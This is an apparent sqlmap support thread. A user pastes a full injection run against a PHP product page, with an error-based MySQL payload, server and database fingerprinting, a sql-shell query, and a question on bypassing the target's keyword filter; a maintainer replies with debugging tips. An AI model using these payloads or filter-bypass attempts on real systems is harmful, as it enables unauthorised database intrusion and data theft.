Unable to retrieve the table names for any database

[kshvb]

Hello, I have one problem. Sqlmap can't retrieve table names from one website only database.

sqlmap -u "http://mywebsite.com/products.php?id=231" --random-agent --all
___
H
___ [)]__ ___ ___ {1.2.2#stable}
|_ -| . [.] | .'| . |
|| [']|||__,| |
||V || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:44:58

[02:44:58] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36' from file '/usr/share/sqlmap/txt/user-agents.txt'
[02:44:58] [INFO] resuming back-end DBMS 'mysql'
[02:44:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: show (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: id=231 PROCEDURE ANALYSE(EXTRACTVALUE(4971,CONCAT(0x5c,0x71706b7a71,(SELECT (CASE WHEN (4971=4971) THEN 1 ELSE 0 END)),0x716b626b71)),1)

[02:45:01] [INFO] the back-end DBMS is MySQL
[02:45:01] [INFO] fetching banner
[02:45:01] [INFO] resumed: 5.5.55-0+deb8u1-log
web server operating system: Linux Debian 8.0 (jessie)
web application technology: PHP 5.4.45, Apache 2.4.10
back-end DBMS: MySQL >= 5.1
banner: '5.5.55-0+deb8u1-log'
[02:45:01] [INFO] fetching current user
[02:45:01] [INFO] resumed: dnbwww@...
current user: 'dnbwww@...'
[02:45:01] [INFO] fetching current database
[02:45:01] [INFO] resumed: dnb
current database: 'dnb'
[02:45:01] [INFO] fetching server hostname
[02:45:01] [INFO] resumed: dnbhost
hostname: 'dnbhost'
[02:45:01] [INFO] testing if current user is DBA
[02:45:01] [INFO] fetching current user
[02:45:04] [WARNING] reflective value(s) found and filtering out
current user is DBA: False
[02:45:04] [INFO] fetching database users
[02:45:07] [WARNING] the SQL query provided does not return any output
[02:45:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[02:45:07] [ERROR] unable to retrieve the database users
[02:45:07] [INFO] fetching database users password hashes
[02:45:10] [WARNING] the SQL query provided does not return any output
[02:45:10] [ERROR] unable to retrieve the password hashes for the database users (probably because the DBMS current user has no read privileges over the relevant system database table(s))
[02:45:10] [INFO] fetching database users privileges
[02:45:13] [WARNING] the SQL query provided does not return any output
[02:45:13] [CRITICAL] unable to retrieve the privileges for the database users
[02:45:13] [WARNING] on MySQL the concept of roles does not exist. sqlmap will enumerate privileges instead
[02:45:13] [INFO] fetching database users privileges
[02:45:16] [WARNING] the SQL query provided does not return any output
[02:45:16] [CRITICAL] unable to retrieve the privileges for the database users
[02:45:16] [INFO] sqlmap will dump entries of all tables from all databases now
[02:45:16] [INFO] fetching database names
[02:45:19] [WARNING] the SQL query provided does not return any output
[02:45:19] [INFO] falling back to current database
[02:45:19] [INFO] fetching current database
[02:45:19] [INFO] fetching tables for database: 'dnb'
[02:45:22] [WARNING] the SQL query provided does not return any output
[02:45:22] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] q
[02:46:26] [ERROR] user quit
[02:49:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: PHP 5.4.45, Apache 2.4.10
back-end DBMS: MySQL >= 5.1
[02:49:39] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> @@datadir
[02:49:42] [INFO] fetching SQL query output: '@@datadir'
[02:49:42] [INFO] resumed: /var/lib/mysql/
@@datadir: '/var/lib/mysql/'

What I should do?

[stamparm]

You have error-based SQL injection, one of easiest to debug. Please learn something by inspecting the traffic (e.g. with --proxy or -t traffic.txt) or try to use --parse-errors. I bet that there is an obvious explanation to all of this and that you could probably find it inside DBMS errors

[kshvb]

Hello,
parse-errors give me this:

[15:52:05] [WARNING] parsed DBMS error message: 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x766d7a6f6e65)),0x716b626' at line 10'
[15:52:05] [WARNING] reflective value(s) found and filtering out
[15:52:05] [WARNING] the SQL query provided does not return any output
[15:52:05] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

I try with both (no-cast and hex) and is same thing.

[stamparm]

I don't see a problem here. This payload is a standard one. This kind of problems can occur when the target is filtering and/or replacing some of keywords.

[kshvb]

But then why, he get database name successfull? Is there a way to bypass this filter? Thank you!

[mahmodjay]

smae thing with me ><

[sharifulgeo]

Same with me either!!